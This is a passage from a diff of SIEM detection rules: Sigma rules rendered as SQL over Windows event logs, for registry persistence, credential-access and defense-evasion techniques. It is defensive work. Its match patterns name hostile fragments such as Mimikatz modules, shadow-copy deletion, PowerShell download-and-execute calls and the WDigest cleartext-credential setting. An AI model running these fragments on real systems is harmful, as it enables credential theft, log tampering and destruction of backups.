LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth 